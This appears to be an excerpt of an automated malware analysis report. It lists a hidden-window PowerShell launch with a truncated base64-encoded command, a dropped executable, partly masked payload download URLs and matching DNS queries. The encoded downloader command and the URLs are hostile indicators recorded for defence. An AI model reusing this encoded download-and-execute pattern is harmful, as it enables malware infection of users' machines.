Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAdQBhAHYAagBvAHUAcQB1AGcAbwBpAHAAeABhAHUAZgBkAGkAcgBwAGkAZQBjAD0AJwBnAHUAYQB6AHcAbwB6AG4AZQB1AGQAdgBlAGEAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...
- %HOMEPATH%\551.exe
- http://www.wa###utv.com/wp-includes/B/
- http://un####ldstudios.com/plugins/x2/
- http://ga###nlogy.com/images/4x2vqro/
- DNS ASK on#####x.martinface.com
- DNS ASK vi###.#artinface.com
- DNS ASK wa###utv.com
- DNS ASK un####ldstudios.com
- DNS ASK ga###nlogy.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB0AGgAdQBhAHYAagBvAHUAcQB1AGcAbwBpAHAAeABhAHUAZgBkAGkAcgBwAGkAZQBjAD0AJwBnAHUAYQB6AHcAbwB6AG4AZQB1AGQAdgBlAGEAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6AD...' (with hidden window)